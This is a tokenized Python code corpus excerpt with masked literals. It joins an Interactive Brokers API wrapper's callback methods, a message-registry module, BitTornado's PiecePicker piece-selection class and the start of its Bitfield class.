suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def execDetails ( self , reqId , contract , execution ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : contract , <EOL> '<STR_LIT>' : execution } <EOL> self . executions . append ( reqId , execution ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , msg ) <EOL> def execDetailsEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def fundamentalData ( self , reqId , data ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:data>' : data } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def historicalData ( self , reqId , date , open , high , low , close , volume , count , WAP , hasGaps ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:date>' : date , <EOL> '<STR_LIT>' : open , <EOL> '<STR_LIT>' : high , <EOL> '<STR_LIT>' : low , <EOL> '<STR_LIT>' : close , <EOL> '<STR_LIT>' : volume , <EOL> '<STR_LIT:count>' : count , <EOL> '<STR_LIT>' : WAP , <EOL> '<STR_LIT>' : hasGaps } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def managedAccounts ( self , accountsList ) : <EOL> msg = filter ( None , accountsList . split ( '<STR_LIT:U+002C>' ) ) <EOL> self . account . child_accounts = msg <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def marketDataType ( self , reqId , marketDataType ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : marketDataType } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def nextValidId ( self , orderId ) : <EOL> msg = { '<STR_LIT>' : orderId } <EOL> self . order_id = orderId <EOL> if self . 
suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def openOrder ( self , orderId , contract , order , orderState ) : <EOL> msg = { '<STR_LIT>' : orderId , <EOL> '<STR_LIT>' : contract , <EOL> '<STR_LIT>' : order , <EOL> '<STR_LIT>' : orderState } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def openOrderEnd ( self ) : <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def orderStatus ( self , orderId , status , filled , remaining , avgFillPrice , permId , parentId , lastFillPrice , clientId , <EOL> whyHeld ) : <EOL> msg = { '<STR_LIT>' : orderId , <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : filled , <EOL> '<STR_LIT>' : remaining , <EOL> '<STR_LIT>' : avgFillPrice , <EOL> '<STR_LIT>' : permId , <EOL> '<STR_LIT>' : parentId , <EOL> '<STR_LIT>' : lastFillPrice , <EOL> '<STR_LIT>' : clientId , <EOL> '<STR_LIT>' : whyHeld } <EOL> self . order_messages . append ( msg ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def realtimeBar ( self , reqId , time , open , high , low , close , volume , wap , count ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:time>' : time , <EOL> '<STR_LIT>' : open , <EOL> '<STR_LIT>' : high , <EOL> '<STR_LIT>' : low , <EOL> '<STR_LIT>' : close , <EOL> '<STR_LIT>' : volume , <EOL> '<STR_LIT>' : wap , <EOL> '<STR_LIT:count>' : count } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def receiveFA ( self , faDataType , xml ) : <EOL> msg = { '<STR_LIT>' : faDataType , <EOL> '<STR_LIT>' : xml } <EOL> if self . 
suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerData ( self , reqId , rank , contractDetails , distance , benchmark , projection , legsStr ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : rank , <EOL> '<STR_LIT>' : contractDetails , <EOL> '<STR_LIT>' : distance , <EOL> '<STR_LIT>' : benchmark , <EOL> '<STR_LIT>' : projection , <EOL> '<STR_LIT>' : legsStr } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerDataEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerParameters ( self , xml ) : <EOL> msg = { '<STR_LIT>' : xml } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickEFP ( self , tickerId , tickType , basisPoints , formattedBasisPoints , impliedFuture , holdDays , futureExpiry , <EOL> dividendImpact , dividendsToExpiry ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT>' : basisPoints , <EOL> '<STR_LIT>' : formattedBasisPoints , <EOL> '<STR_LIT>' : impliedFuture , <EOL> '<STR_LIT>' : holdDays , <EOL> '<STR_LIT>' : futureExpiry , <EOL> '<STR_LIT>' : dividendImpact , <EOL> '<STR_LIT>' : dividendsToExpiry } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickGeneric ( self , tickerId , tickType , value ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT:value>' : value } <EOL> if self . 
suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickOptionComputation ( self , tickerId , field , impliedVol , delta , optPrice , pvDividend , gamma , vega , theta , <EOL> undPrice ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT>' : impliedVol , <EOL> '<STR_LIT>' : delta , <EOL> '<STR_LIT>' : optPrice , <EOL> '<STR_LIT>' : pvDividend , <EOL> '<STR_LIT>' : gamma , <EOL> '<STR_LIT>' : vega , <EOL> '<STR_LIT>' : theta , <EOL> '<STR_LIT>' : undPrice } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickPrice ( self , tickerId , field , price , canAutoExecute ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT>' : canAutoExecute } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickSize ( self , tickerId , field , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickSnapshotEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickString ( self , tickerId , tickType , value ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT:value>' : value } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateAccountTime ( self , timeStamp ) : <EOL> msg = { '<STR_LIT>' : timeStamp } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateAccountValue ( self , key , value , currency , accountName ) : <EOL> msg = AccountMessage ( key , value , currency ) <EOL> if '<STR_LIT>' in self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . 
messages = [ msg ] <EOL> else : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . add_message ( msg ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateMktDepth ( self , tickerId , position , operation , side , price , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : position , <EOL> '<STR_LIT>' : operation , <EOL> '<STR_LIT>' : side , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateMktDepthL2 ( self , tickerId , position , marketMaker , operation , side , price , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : position , <EOL> '<STR_LIT>' : marketMaker , <EOL> '<STR_LIT>' : operation , <EOL> '<STR_LIT>' : side , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateNewsBulletin ( self , msgId , msgType , message , origExchange ) : <EOL> msg = { '<STR_LIT>' : msgId , <EOL> '<STR_LIT>' : msgType , <EOL> '<STR_LIT:message>' : message , <EOL> '<STR_LIT>' : origExchange } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updatePortfolio ( self , contract , position , marketPrice , marketValue , averageCost , unrealizedPNL , realizedPNL , <EOL> accountName ) : <EOL> msg = PortfolioMessage ( contract , <EOL> position , <EOL> marketPrice , <EOL> marketValue , <EOL> averageCost , <EOL> unrealizedPNL , <EOL> realizedPNL , <EOL> accountName ) <EOL> if '<STR_LIT>' in self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages = [ msg ] <EOL> else : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . add_message ( msg ) <EOL> if self . 
suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error ( self , id = None , errorCode = None , errorMsg = None ) : <EOL> msg = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT>' : errorCode , <EOL> '<STR_LIT>' : errorMsg } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT:error>' , vars ( ) ) </s>
<s> """<STR_LIT>""" </s>
<s> from ast import NodeVisitor , parse <EOL> from inspect import getsourcefile <EOL> from re import match <EOL> from ib . ext . AnyWrapper import AnyWrapper <EOL> from ib . ext . EWrapper import EWrapper <EOL> from ib . ext . EClientSocket import EClientSocket <EOL> from ib . lib import toTypeName <EOL> class SignatureAccumulator ( NodeVisitor ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def __init__ ( self , classes ) : <EOL> NodeVisitor . __init__ ( self ) <EOL> self . signatures = [ ] <EOL> for filename in ( getsourcefile ( cls ) for cls in classes ) : <EOL> self . visit ( parse ( open ( filename ) . read ( ) ) ) <EOL> def visit_FunctionDef ( self , node ) : <EOL> args = [ arg . id for arg in node . args . args ] <EOL> self . signatures . append ( ( node . name , args [ <NUM_LIT:1> : ] ) ) <EOL> class EClientSocketAccumulator ( SignatureAccumulator ) : <EOL> def getSignatures ( self ) : <EOL> for name , args in self . signatures : <EOL> if match ( '<STR_LIT>' , name ) : <EOL> yield ( name , args ) <EOL> class EWrapperAccumulator ( SignatureAccumulator ) : <EOL> def getSignatures ( self ) : <EOL> for name , args in self . signatures : <EOL> if match ( '<STR_LIT>' , name ) : <EOL> yield ( name , args ) <EOL> registry = { } <EOL> def messageTypeNames ( ) : <EOL> """<STR_LIT>""" <EOL> def typeNames ( ) : <EOL> for types in registry . values ( ) : <EOL> for typ in types : <EOL> yield typ . typeName <EOL> return set ( typeNames ( ) ) <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> def __init__ ( self , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> for name in self . __slots__ : <EOL> setattr ( self , name , kwds . pop ( name , None ) ) <EOL> assert not kwds <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . keys ( ) ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> name = self . typeName <EOL> items = str . join ( '<STR_LIT:U+002CU+0020>' , [ '<STR_LIT>' % item for item in self . 
items ( ) ] ) <EOL> return '<STR_LIT>' % ( name , ( '<STR_LIT:U+0020>' + items ) if items else '<STR_LIT>' ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return zip ( self . keys ( ) , self . values ( ) ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ getattr ( self , key , None ) for key in self . keys ( ) ] <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __slots__ <EOL> class Error ( Message ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def buildMessageRegistry ( seq , suffixes = [ '<STR_LIT>' ] , bases = ( Message , ) ) : <EOL> """<STR_LIT>""" <EOL> for name , args in sorted ( seq ) : <EOL> for suffix in suffixes : <EOL> typename = toTypeName ( name ) + suffix <EOL> typens = { '<STR_LIT>' : args , '<STR_LIT>' : name , '<STR_LIT>' : name } <EOL> msgtype = type ( typename , bases , typens ) <EOL> if name in registry : <EOL> registry [ name ] = registry [ name ] + ( msgtype , ) <EOL> else : <EOL> registry [ name ] = ( msgtype , ) <EOL> eWrapperAccum = EWrapperAccumulator ( ( AnyWrapper , EWrapper ) ) <EOL> eClientAccum = EClientSocketAccumulator ( ( EClientSocket , ) ) <EOL> wrapperMethods = list ( eWrapperAccum . getSignatures ( ) ) <EOL> clientSocketMethods = list ( eClientAccum . getSignatures ( ) ) <EOL> errorMethods = [ ( '<STR_LIT:error>' , Error . __slots__ ) , ] <EOL> buildMessageRegistry ( wrapperMethods ) <EOL> buildMessageRegistry ( clientSocketMethods , suffixes = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> buildMessageRegistry ( errorMethods ) <EOL> def initModule ( ) : <EOL> target = globals ( ) <EOL> for messageTypes in registry . values ( ) : <EOL> for messageType in messageTypes : <EOL> target [ messageType . 
typeName ] = messageType <EOL> try : <EOL> initModule ( ) <EOL> except ( NameError , ) : <EOL> pass <EOL> else : <EOL> del ( initModule ) <EOL> del ( AnyWrapper ) <EOL> del ( EWrapper ) <EOL> del ( EClientSocket ) <EOL> del ( eWrapperAccum ) <EOL> del ( eClientAccum ) </s>
<s> from random import randrange , shuffle <EOL> from BitTornado . clock import clock <EOL> try : <EOL> True <EOL> except : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> class PiecePicker : <EOL> def __init__ ( self , numpieces , <EOL> rarest_first_cutoff = <NUM_LIT:1> , rarest_first_priority_cutoff = <NUM_LIT:3> , <EOL> priority_step = <NUM_LIT:20> ) : <EOL> self . rarest_first_cutoff = rarest_first_cutoff <EOL> self . rarest_first_priority_cutoff = rarest_first_priority_cutoff + priority_step <EOL> self . priority_step = priority_step <EOL> self . cutoff = rarest_first_priority_cutoff <EOL> self . numpieces = numpieces <EOL> self . started = [ ] <EOL> self . totalcount = <NUM_LIT:0> <EOL> self . numhaves = [ <NUM_LIT:0> ] * numpieces <EOL> self . priority = [ <NUM_LIT:1> ] * numpieces <EOL> self . removed_partials = { } <EOL> self . crosscount = [ numpieces ] <EOL> self . crosscount2 = [ numpieces ] <EOL> self . has = [ <NUM_LIT:0> ] * numpieces <EOL> self . numgot = <NUM_LIT:0> <EOL> self . done = False <EOL> self . seed_connections = { } <EOL> self . past_ips = { } <EOL> self . seed_time = None <EOL> self . superseed = False <EOL> self . seeds_connected = <NUM_LIT:0> <EOL> self . _init_interests ( ) <EOL> def _init_interests ( self ) : <EOL> self . interests = [ [ ] for x in xrange ( self . priority_step ) ] <EOL> self . level_in_interests = [ self . priority_step ] * self . numpieces <EOL> interests = range ( self . numpieces ) <EOL> shuffle ( interests ) <EOL> self . pos_in_interests = [ <NUM_LIT:0> ] * self . numpieces <EOL> for i in xrange ( self . numpieces ) : <EOL> self . pos_in_interests [ interests [ i ] ] = i <EOL> self . interests . append ( interests ) <EOL> def got_have ( self , piece ) : <EOL> self . totalcount += <NUM_LIT:1> <EOL> numint = self . numhaves [ piece ] <EOL> self . numhaves [ piece ] += <NUM_LIT:1> <EOL> self . crosscount [ numint ] -= <NUM_LIT:1> <EOL> if numint + <NUM_LIT:1> == len ( self . crosscount ) : <EOL> self . 
crosscount . append ( <NUM_LIT:0> ) <EOL> self . crosscount [ numint + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if not self . done : <EOL> numintplus = numint + self . has [ piece ] <EOL> self . crosscount2 [ numintplus ] -= <NUM_LIT:1> <EOL> if numintplus + <NUM_LIT:1> == len ( self . crosscount2 ) : <EOL> self . crosscount2 . append ( <NUM_LIT:0> ) <EOL> self . crosscount2 [ numintplus + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> if self . superseed : <EOL> self . seed_got_haves [ piece ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> elif self . has [ piece ] or self . priority [ piece ] == - <NUM_LIT:1> : <EOL> return <EOL> if numint == len ( self . interests ) - <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . interests [ numint + <NUM_LIT:1> ] ) <EOL> def lost_have ( self , piece ) : <EOL> self . totalcount -= <NUM_LIT:1> <EOL> numint = self . numhaves [ piece ] <EOL> self . numhaves [ piece ] -= <NUM_LIT:1> <EOL> self . crosscount [ numint ] -= <NUM_LIT:1> <EOL> self . crosscount [ numint - <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> if not self . done : <EOL> numintplus = numint + self . has [ piece ] <EOL> self . crosscount2 [ numintplus ] -= <NUM_LIT:1> <EOL> self . crosscount2 [ numintplus - <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] -= <NUM_LIT:1> <EOL> if self . superseed : <EOL> numint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] -= <NUM_LIT:1> <EOL> elif self . has [ piece ] or self . priority [ piece ] == - <NUM_LIT:1> : <EOL> return <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . 
interests [ numint - <NUM_LIT:1> ] ) <EOL> def _shift_over ( self , piece , l1 , l2 ) : <EOL> assert self . superseed or ( not self . has [ piece ] and self . priority [ piece ] >= <NUM_LIT:0> ) <EOL> parray = self . pos_in_interests <EOL> p = parray [ piece ] <EOL> assert l1 [ p ] == piece <EOL> q = l1 [ - <NUM_LIT:1> ] <EOL> l1 [ p ] = q <EOL> parray [ q ] = p <EOL> del l1 [ - <NUM_LIT:1> ] <EOL> newp = randrange ( len ( l2 ) + <NUM_LIT:1> ) <EOL> if newp == len ( l2 ) : <EOL> parray [ piece ] = len ( l2 ) <EOL> l2 . append ( piece ) <EOL> else : <EOL> old = l2 [ newp ] <EOL> parray [ old ] = len ( l2 ) <EOL> l2 . append ( old ) <EOL> l2 [ newp ] = piece <EOL> parray [ piece ] = newp <EOL> def got_seed ( self ) : <EOL> self . seeds_connected += <NUM_LIT:1> <EOL> self . cutoff = max ( self . rarest_first_priority_cutoff - self . seeds_connected , <NUM_LIT:0> ) <EOL> def became_seed ( self ) : <EOL> self . got_seed ( ) <EOL> self . totalcount -= self . numpieces <EOL> self . numhaves = [ i - <NUM_LIT:1> for i in self . numhaves ] <EOL> if self . superseed or not self . done : <EOL> self . level_in_interests = [ i - <NUM_LIT:1> for i in self . level_in_interests ] <EOL> if self . interests : <EOL> del self . interests [ <NUM_LIT:0> ] <EOL> del self . crosscount [ <NUM_LIT:0> ] <EOL> if not self . done : <EOL> del self . crosscount2 [ <NUM_LIT:0> ] <EOL> def lost_seed ( self ) : <EOL> self . seeds_connected -= <NUM_LIT:1> <EOL> self . cutoff = max ( self . rarest_first_priority_cutoff - self . seeds_connected , <NUM_LIT:0> ) <EOL> def requested ( self , piece ) : <EOL> if piece not in self . started : <EOL> self . started . append ( piece ) <EOL> def _remove_from_interests ( self , piece , keep_partial = False ) : <EOL> l = self . interests [ self . level_in_interests [ piece ] ] <EOL> p = self . pos_in_interests [ piece ] <EOL> assert l [ p ] == piece <EOL> q = l [ - <NUM_LIT:1> ] <EOL> l [ p ] = q <EOL> self . 
pos_in_interests [ q ] = p <EOL> del l [ - <NUM_LIT:1> ] <EOL> try : <EOL> self . started . remove ( piece ) <EOL> if keep_partial : <EOL> self . removed_partials [ piece ] = <NUM_LIT:1> <EOL> except ValueError : <EOL> pass <EOL> def complete ( self , piece ) : <EOL> assert not self . has [ piece ] <EOL> self . has [ piece ] = <NUM_LIT:1> <EOL> self . numgot += <NUM_LIT:1> <EOL> if self . numgot == self . numpieces : <EOL> self . done = True <EOL> self . crosscount2 = self . crosscount <EOL> else : <EOL> numhaves = self . numhaves [ piece ] <EOL> self . crosscount2 [ numhaves ] -= <NUM_LIT:1> <EOL> if numhaves + <NUM_LIT:1> == len ( self . crosscount2 ) : <EOL> self . crosscount2 . append ( <NUM_LIT:0> ) <EOL> self . crosscount2 [ numhaves + <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> self . _remove_from_interests ( piece ) <EOL> def next ( self , haves , wantfunc , complete_first = False ) : <EOL> cutoff = self . numgot < self . rarest_first_cutoff <EOL> complete_first = ( complete_first or cutoff ) and not haves . complete ( ) <EOL> best = None <EOL> bestnum = <NUM_LIT:2> ** <NUM_LIT:30> <EOL> for i in self . started : <EOL> if haves [ i ] and wantfunc ( i ) : <EOL> if self . level_in_interests [ i ] < bestnum : <EOL> best = i <EOL> bestnum = self . level_in_interests [ i ] <EOL> if best is not None : <EOL> if complete_first or ( cutoff and len ( self . interests ) > self . cutoff ) : <EOL> return best <EOL> if haves . complete ( ) : <EOL> r = [ ( <NUM_LIT:0> , min ( bestnum , len ( self . interests ) ) ) ] <EOL> elif cutoff and len ( self . interests ) > self . cutoff : <EOL> r = [ ( self . cutoff , min ( bestnum , len ( self . interests ) ) ) , <EOL> ( <NUM_LIT:0> , self . cutoff ) ] <EOL> else : <EOL> r = [ ( <NUM_LIT:0> , min ( bestnum , len ( self . interests ) ) ) ] <EOL> for lo , hi in r : <EOL> for i in xrange ( lo , hi ) : <EOL> for j in self . 
interests [ i ] : <EOL> if haves [ j ] and wantfunc ( j ) : <EOL> return j <EOL> if best is not None : <EOL> return best <EOL> return None <EOL> def am_I_complete ( self ) : <EOL> return self . done <EOL> def bump ( self , piece ) : <EOL> l = self . interests [ self . level_in_interests [ piece ] ] <EOL> pos = self . pos_in_interests [ piece ] <EOL> del l [ pos ] <EOL> l . append ( piece ) <EOL> for i in range ( pos , len ( l ) ) : <EOL> self . pos_in_interests [ l [ i ] ] = i <EOL> try : <EOL> self . started . remove ( piece ) <EOL> except : <EOL> pass <EOL> def set_priority ( self , piece , p ) : <EOL> if self . superseed : <EOL> return False <EOL> oldp = self . priority [ piece ] <EOL> if oldp == p : <EOL> return False <EOL> self . priority [ piece ] = p <EOL> if p == - <NUM_LIT:1> : <EOL> if not self . has [ piece ] : <EOL> self . _remove_from_interests ( piece , True ) <EOL> return True <EOL> if oldp == - <NUM_LIT:1> : <EOL> level = self . numhaves [ piece ] + ( self . priority_step * p ) <EOL> self . level_in_interests [ piece ] = level <EOL> if self . has [ piece ] : <EOL> return True <EOL> while len ( self . interests ) < level + <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> l2 = self . interests [ level ] <EOL> parray = self . pos_in_interests <EOL> newp = randrange ( len ( l2 ) + <NUM_LIT:1> ) <EOL> if newp == len ( l2 ) : <EOL> parray [ piece ] = len ( l2 ) <EOL> l2 . append ( piece ) <EOL> else : <EOL> old = l2 [ newp ] <EOL> parray [ old ] = len ( l2 ) <EOL> l2 . append ( old ) <EOL> l2 [ newp ] = piece <EOL> parray [ piece ] = newp <EOL> if self . removed_partials . has_key ( piece ) : <EOL> del self . removed_partials [ piece ] <EOL> self . started . append ( piece ) <EOL> return True <EOL> numint = self . level_in_interests [ piece ] <EOL> newint = numint + ( ( p - oldp ) * self . priority_step ) <EOL> self . level_in_interests [ piece ] = newint <EOL> if self . has [ piece ] : <EOL> return False <EOL> while len ( self . 
interests ) < newint + <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , self . interests [ numint ] , self . interests [ newint ] ) <EOL> return False <EOL> def is_blocked ( self , piece ) : <EOL> return self . priority [ piece ] < <NUM_LIT:0> <EOL> def set_superseed ( self ) : <EOL> assert self . done <EOL> self . superseed = True <EOL> self . seed_got_haves = [ <NUM_LIT:0> ] * self . numpieces <EOL> self . _init_interests ( ) <EOL> def next_have ( self , connection , looser_upload ) : <EOL> if self . seed_time is None : <EOL> self . seed_time = clock ( ) <EOL> return None <EOL> if clock ( ) < self . seed_time + <NUM_LIT:10> : <EOL> return None <EOL> if not connection . upload . super_seeding : <EOL> return None <EOL> olddl = self . seed_connections . get ( connection ) <EOL> if olddl is None : <EOL> ip = connection . get_ip ( ) <EOL> olddl = self . past_ips . get ( ip ) <EOL> if olddl is not None : <EOL> self . seed_connections [ connection ] = olddl <EOL> if not looser_upload : <EOL> self . seed_got_haves [ olddl ] -= <NUM_LIT:1> <EOL> if olddl is not None : <EOL> if looser_upload : <EOL> num = <NUM_LIT:1> <EOL> else : <EOL> num = <NUM_LIT:2> <EOL> if self . seed_got_haves [ olddl ] < num : <EOL> return None <EOL> if not connection . upload . was_ever_interested : <EOL> connection . upload . skipped_count += <NUM_LIT:1> <EOL> if connection . upload . skipped_count >= <NUM_LIT:3> : <EOL> return - <NUM_LIT:1> <EOL> for tier in self . interests : <EOL> for piece in tier : <EOL> if not connection . download . have [ piece ] : <EOL> seedint = self . level_in_interests [ piece ] <EOL> self . level_in_interests [ piece ] += <NUM_LIT:1> <EOL> if seedint == len ( self . interests ) - <NUM_LIT:1> : <EOL> self . interests . append ( [ ] ) <EOL> self . _shift_over ( piece , <EOL> self . interests [ seedint ] , self . interests [ seedint + <NUM_LIT:1> ] ) <EOL> self . seed_got_haves [ piece ] = <NUM_LIT:0> <EOL> self . 
seed_connections [ connection ] = piece <EOL> connection . upload . seed_have_list . append ( piece ) <EOL> return piece <EOL> return - <NUM_LIT:1> <EOL> def lost_peer ( self , connection ) : <EOL> olddl = self . seed_connections . get ( connection ) <EOL> if olddl is None : <EOL> return <EOL> del self . seed_connections [ connection ] <EOL> self . past_ips [ connection . get_ip ( ) ] = olddl <EOL> if self . seed_got_haves [ olddl ] == <NUM_LIT:1> : <EOL> self . seed_got_haves [ olddl ] = <NUM_LIT:0> </s>
<s> try : <EOL> True <EOL> except : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> bool = lambda x : not not x <EOL> try : <EOL> sum ( [ <NUM_LIT:1> ] ) <EOL> negsum = lambda a : len ( a ) - sum ( a ) <EOL> except : <EOL> negsum = lambda a : reduce ( lambda x , y : x + ( not y ) , a , <NUM_LIT:0> ) <EOL> def _int_to_booleans ( x ) : <EOL> r = [ ] <EOL> for i in range ( <NUM_LIT:8> ) : <EOL> r . append ( bool ( x & <NUM_LIT> ) ) <EOL> x <<= <NUM_LIT:1> <EOL> return tuple ( r ) <EOL> lookup_table = [ ] <EOL> reverse_lookup_table = { } <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> x = _int_to_booleans ( i ) <EOL> lookup_table . append ( x ) <EOL> reverse_lookup_table [ x ] = chr ( i ) <EOL> class Bitfield : <EOL> def __init__ ( self , length = None , bitstring = None , copyfrom = None ) : <EOL> if copyfrom is not None : <EOL> self . length = copyfrom . length <EOL> self . array = copyfrom . array [ : ] <EOL> self . numfalse = copyfrom . numfalse <EOL> return <EOL> if length is None : <EOL> raise ValueError , "<STR_LIT>" <EOL> self . length = length <EOL> if bitstring is not None : <EOL> extra = len ( bitstring ) * <NUM_LIT:8> - length <EOL> if extra < <NUM_LIT:0> or extra >= <NUM_LIT:8> : <EOL> raise ValueError <EOL> t = lookup_table <EOL> r = [ ] <EOL> for c in bitstring : <EOL> r . extend ( t [ ord ( c ) ] ) <EOL> if extra > <NUM_LIT:0> : <EOL> if r [ - extra : ] != [ <NUM_LIT:0> ] * extra : <EOL> raise ValueError <EOL> del r [ - extra : ] <EOL> self . array = r <EOL> self . numfalse = negsum ( r ) <EOL> else : <EOL> self . array = [ False ] * length <EOL> self . numfalse = length <EOL> def __setitem__ ( self , index , val ) : <EOL> val = bool ( val ) <EOL> self . numfalse += self . array [ index ] - val <EOL> self . array [ index ] = val <EOL> def __getitem__ ( self , index ) : <EOL> return self . array [ index ] <EOL> def __len__ ( self ) : <EOL> return self . length <EOL> def tostring ( self ) : <EOL> booleans = self . 
